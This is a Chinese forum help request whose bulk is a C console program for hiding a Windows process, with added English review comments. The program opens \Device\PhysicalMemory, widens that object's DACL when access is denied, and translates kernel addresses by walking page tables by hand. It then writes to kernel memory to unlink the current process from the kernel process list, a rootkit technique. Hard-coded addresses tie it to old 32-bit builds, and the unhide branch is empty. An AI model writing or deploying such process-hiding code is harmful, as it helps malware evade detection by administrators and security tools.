偶最近看到一段隐藏进程的代码，是MFC的程序，由于没学MFC，于是把它改成Console的。
ZwOpenSection总是返回失败，理论上应该返回STATUS_ACCESS_DENIED才对，实在是不解，还望赐教。
方法是前人用烂的摘链法，代码如下：
#include <stdio.h>
//#include <windows.h>
#include <aclapi.h>
/* Hand-rolled subset of the native (ntdll) API: the file does not use the
 * DDK headers, so the status codes, UNICODE_STRING / OBJECT_ATTRIBUTES and
 * the two function-pointer types below are declared locally, and the
 * functions themselves are fetched with GetProcAddress (see
 * OpenPhyMemObject). */
typedef LONG NTSTATUS;
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)      /* non-negative status == success */
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L) /* declared but unused in this file */
#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)        /* triggers the DACL-widening retry in OpenPhyMemObject */
/* Counted wide string as used by the native API. */
typedef struct _UNICODE_STRING
{
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
/* Object name and open parameters for the Zw* object-open calls. */
typedef struct _OBJECT_ATTRIBUTES
{
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
/* ntdll!ZwOpenSection, resolved at runtime in OpenPhyMemObject. */
typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
    OUT PHANDLE SectionHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes
);
/* ntdll!RtlInitUnicodeString, resolved at runtime in OpenPhyMemObject. */
typedef VOID (CALLBACK* RTLINITUNICODESTRING)(
    IN OUT PUNICODE_STRING DestinationString,
    IN PCWSTR SourceString
);
/* Process-wide state shared by the functions below. */
static bool ishide = false;     /* set/cleared by main() after a reported hide/unhide; only read by hideprocess() */
HANDLE hSection = NULL;         /* section handle filled in by OpenPhyMemObject(); never closed anywhere in this file */
PVOID mapPhyMemObject = NULL;   /* view of the page at PhyDirAddress, passed to LinerAddressToPhysicAddress() as the directory base; never unmapped */
/*
 * Translate a virtual address to a physical one by walking the two-level
 * 32-bit page tables by hand (10-bit directory index, 10-bit table index,
 * 12-bit page offset — see the shifts and masks below).
 *
 * Base    - view of the page-directory page (callers pass mapPhyMemObject),
 *           indexed with the top 10 bits of address.
 * address - virtual address to translate.
 * Returns the physical address, or 0 when the directory entry or the table
 * entry has its present bit (bit 0) clear.
 *
 * NOTE(review): the format assumed here (PS bit 0x80 selecting 4 MB pages,
 * otherwise 4 KB pages) is the classic non-PAE x86 layout; on a PAE or
 * 64-bit kernel this walk would read unrelated data — to be confirmed.
 */
PVOID LinerAddressToPhysicAddress(PULONG Base, PVOID address)
{
    ULONG VAddress = (ULONG)address;
    ULONG PDE,PTE,PAddress;
    PDE = Base[VAddress>>22];            /* page-directory entry for this address */
    if((PDE&1)==0)
        return 0;                        /* directory entry not present */
    ULONG PageFlage = PDE&0x00000080;    /* PS (page size) bit */
    if (PageFlage != 0)
    {
        //PS bit set: 4 MB page, the PDE itself holds the frame address
        PAddress = (PDE&0xffc00000) + (VAddress&0x003fffff);
    }
    else
    {
        //PS bit clear: 4 KB pages; map the page table and read the PTE.
        //The literal 4 is FILE_MAP_READ.
        //NOTE(review): the MapViewOfFile result is used unchecked — a NULL
        //return would be dereferenced on the next line.
        PDE = (ULONG)MapViewOfFile(hSection,4,0,PDE&0xfffff000,0x1000);
        PTE = ((PULONG)PDE)[(VAddress&0x003ff000)>>12];
        if((PTE&1) == 0)
            return 0;                    /* NOTE(review): returns without UnmapViewOfFile, leaking the view */
        PAddress = (PTE&0xfffff000)+(VAddress&0x00000fff);
        UnmapViewOfFile((PVOID)PDE);
    }
    return (PVOID)PAddress;
}
/*
 * Read one ULONG of kernel memory at virtual address addr.
 * Translates addr through the page directory in mapPhyMemObject, maps the
 * containing 4 KB physical page from hSection, and returns the dword at the
 * page offset.  Returns 0 if the view cannot be mapped.
 *
 * NOTE(review): a translation failure (phys == 0) is not distinguished from
 * a real address, so the code would then map physical page 0 and return
 * whatever is there.  Callers also cannot tell a genuine 0 from failure.
 */
ULONG GetData(PVOID addr)
{
    ULONG phys = (ULONG)LinerAddressToPhysicAddress((PULONG)mapPhyMemObject,(PVOID)addr);
    /* map the page that contains phys; the view is read/write although only a read is done here */
    PULONG tmp = (PULONG)MapViewOfFile(hSection,FILE_MAP_READ|FILE_MAP_WRITE,0,phys&0xfffff000,0x1000);
    if(tmp == 0)
        return 0;
    ULONG ret = tmp[(phys&0xfff)>>2];    /* dword index within the page */
    UnmapViewOfFile(tmp);
    return ret;
}
/*
 * Write one ULONG of kernel memory at virtual address addr.
 * Same translate-map-access-unmap sequence as GetData, with a write-only
 * view.  Returns false if the page could not be mapped, TRUE otherwise.
 *
 * NOTE(review): as in GetData, a translation failure (phys == 0) is not
 * detected, so the write would land in physical page 0.  The return value
 * is ignored by the only caller (hideprocess).
 */
BOOL SetData(PVOID addr, ULONG data)
{
    ULONG phys = (ULONG)LinerAddressToPhysicAddress((PULONG)mapPhyMemObject,(PVOID)addr);
    PULONG tmp = (PULONG)MapViewOfFile(hSection,FILE_MAP_WRITE,0,phys&0xfffff000,0x1000);
    if(tmp == 0)
        return false;
    tmp[(phys&0xfff)>>2] = data;         /* dword index within the page */
    UnmapViewOfFile(tmp);
    return TRUE;
}
/*
 * Grant the current user SECTION_MAP_WRITE on the section hSec by appending
 * one allow-ACE to its existing DACL.
 * hSec is expected to have been opened with READ_CONTROL|WRITE_DAC (see the
 * retry path in OpenPhyMemObject).
 *
 * NOTE(review): the return values of GetSecurityInfo, SetEntriesInAcl and
 * SetSecurityInfo are all ignored, so a failure here is silent and the
 * caller simply retries its open.  "CURRENT_USER" with TRUSTEE_IS_NAME
 * presumably relies on the special trustee names SetEntriesInAcl accepts —
 * verify against the SDK docs.
 */
void AddACEtoPhyMemObject(HANDLE hSec)
{
    PACL pDacl = NULL;
    PSECURITY_DESCRIPTOR pSD = NULL;
    PACL pNewDacl = NULL;
    /* fetch the current DACL; pSD owns the returned memory */
    GetSecurityInfo(hSec,
        SE_KERNEL_OBJECT,
        DACL_SECURITY_INFORMATION,
        NULL,
        NULL,
        &pDacl,
        NULL,
        &pSD);
    EXPLICIT_ACCESS ea;
    RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
    ea.grfAccessPermissions = SECTION_MAP_WRITE;
    ea.grfAccessMode = GRANT_ACCESS;
    ea.grfInheritance= NO_INHERITANCE;
    ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
    ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
    ea.Trustee.ptstrName = "CURRENT_USER";
    /* merge the new entry with the existing DACL into pNewDacl */
    SetEntriesInAcl(1,&ea,pDacl,&pNewDacl);
    SetSecurityInfo(hSec,
        SE_KERNEL_OBJECT,
        DACL_SECURITY_INFORMATION,
        NULL,
        NULL,
        pNewDacl,
        NULL);
    if(pSD)
        LocalFree(pSD);
    if(pNewDacl)
        LocalFree(pNewDacl);
}
/*
 * Open the kernel's physical-memory section object for read/write and map
 * the page at PhyDirAddress into mapPhyMemObject, which
 * LinerAddressToPhysicAddress then uses as the page directory.
 *
 * Flow: open with SECTION_MAP_READ|SECTION_MAP_WRITE; on
 * STATUS_ACCESS_DENIED re-open with READ_CONTROL|WRITE_DAC, widen the DACL
 * via AddACEtoPhyMemObject, and repeat the first open.
 * Returns the section handle (also stored in the global hSection), or NULL
 * after printing a message when the final open does not succeed.
 *
 * NOTE(review): PhyDirAddress is a hard-coded physical address; nothing in
 * this file derives it, so it is tied to one particular kernel build/boot.
 * The handle from the READ_CONTROL|WRITE_DAC open is overwritten (leaked)
 * by the following ZwOpenSection, hSection and mapPhyMemObject are never
 * released, and both GetProcAddress results are used unchecked.  The
 * failure branch discards the status value; printing it would show which
 * status is actually being returned.  As far as I know, current Windows
 * versions reject user-mode opens of this section regardless of its DACL,
 * so this path is only expected to work on old 32-bit kernels.
 */
HANDLE OpenPhyMemObject()
{
    NTSTATUS status;
    UNICODE_STRING PhyMemObjectString;
    OBJECT_ATTRIBUTES attributes;
    ULONG PhyDirAddress = 0x39000;       /* physical address of the page-directory page (magic number) */
    HMODULE hNtdll = LoadLibrary("ntdll.dll");
    RTLINITUNICODESTRING RtlInitUnicodeString =
        (RTLINITUNICODESTRING)GetProcAddress(hNtdll,"RtlInitUnicodeString");
    RtlInitUnicodeString(&PhyMemObjectString,L"Device\\PhysicalMemory");
    attributes.Length = sizeof(OBJECT_ATTRIBUTES);
    attributes.RootDirectory = NULL;
    attributes.ObjectName = &PhyMemObjectString;
    attributes.Attributes = 0;
    attributes.SecurityDescriptor = NULL;
    attributes.SecurityQualityOfService = NULL;
    ZWOPENSECTION ZwOpenSection =
        (ZWOPENSECTION)GetProcAddress(hNtdll, "ZwOpenSection");
    status = ZwOpenSection(&hSection,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
    if(status == STATUS_ACCESS_DENIED)
    {
        /* denied: re-open with just enough rights to edit the DACL, widen it, retry */
        status = ZwOpenSection(&hSection,READ_CONTROL|WRITE_DAC,&attributes);
        AddACEtoPhyMemObject(hSection);
        status = ZwOpenSection(&hSection,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
    }
    if(!NT_SUCCESS(status))
    {
        printf("opensection failed.\n");
        return NULL;
    }
    /* one 4 KB view at PhyDirAddress: the page-directory base for later translations */
    mapPhyMemObject = MapViewOfFile(hSection,FILE_MAP_READ|FILE_MAP_WRITE,0,PhyDirAddress,0x1000);
    FreeLibrary(hNtdll);
    return hSection;
}
/*
 * hide == true : unlink the current process from the kernel's process list
 *                (the "摘链" method named in the post).
 * hide == false: intended to undo that, but the branch is empty, so the
 *                call is a no-op that still reports success.
 *
 * All reads/writes go through physical memory (GetData/SetData):
 *   thread  = dword at 0xffdff124            (hard-coded kernel address)
 *   process = dword at thread  + 0x44
 *   flink   = dword at process + 0x88
 *   blink   = dword at process + 0x8c
 * For a first-time hide it stores blink at flink+4 and flink at blink+0,
 * i.e. a doubly-linked-list unlink where process+0x88 looks like a
 * {Flink, Blink} pair — not confirmed from anything in this file.
 *
 * Returns false only when OpenPhyMemObject fails; true otherwise.
 *
 * NOTE(review): the address and offsets are build-specific magic numbers
 * with no validation; if a GetData call fails it returns 0 and the
 * following accesses silently target small offsets from address 0.
 * OpenPhyMemObject is re-run (and its handle leaked) on every call, and
 * SetData's return values are ignored.  ishide is only read here; it is
 * updated by main().
 */
bool hideprocess(bool hide)
{
    if(!OpenPhyMemObject())
    {
        printf("open physical memory failed.\n");
        return false;
    }
    ULONG thread = GetData((PVOID)0xffdff124);
    ULONG process = GetData((PVOID)(thread + 0x44));
    ULONG flink = GetData((PVOID)(process + 0x88));
    ULONG blink = GetData((PVOID)(process + 0x8c));
    if(hide == true && ishide == false)
    {
        SetData((PVOID)(flink + 4),blink);   /* next->Blink = prev (assumed layout) */
        SetData((PVOID)(blink),flink);       /* prev->Flink = next (assumed layout) */
    }
    if(hide == false && ishide == true)
    {
        //unhide()  -- not implemented; caller still gets true
    }
    return true;
}
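/*
 * Interactive menu: 'h' hides the process, 'u' unhides it, 'e' exits.
 * The global ishide records the last reported hide/unhide so a repeated
 * command is refused.  Returns 0.
 *
 * The command character is read as int so that EOF (closed stdin,
 * Ctrl-Z / Ctrl-D) ends the loop instead of spinning forever on
 * "unknown command"; the remainder of the input line is discarded so
 * that trailing characters are not misread as the next command.
 */
int main()
{
    bool bExit = false;
    bool bRet;
    while(!bExit)
    {
        printf("h to hide\nu to unhide\ne to exit\n");
        int ch = getchar();
        if(ch == EOF)
            break;                       /* no more input: leave the loop cleanly */
        if(ch != '\n')
        {
            /* drain the rest of the line, newline included */
            int rest;
            while((rest = getchar()) != '\n' && rest != EOF)
                ;
        }
        switch(ch)
        {
        case 'h':
            if(ishide == true)
            {
                printf("the process is already hiden.\n");
                break;
            }
            bRet = hideprocess(true);
            if(bRet)
            {
                printf("hide successfully.\n");
                ishide = true;
            }
            else
            {
                printf("hide failed.\n");
            }
            break;
        case 'u':
            if(ishide == false)
            {
                printf("the process is not hiden.\n");
                break;
            }
            bRet = hideprocess(false);
            if(bRet)
            {
                printf("unhide successfully.\n");
                ishide = false;
            }
            else
            {
                printf("unhide failed.\n");
            }
            break;
        case 'e':
            bExit = true;
            break;
        default:
            printf("unknown command.\n");
            break;
        }
    }
    return 0;
}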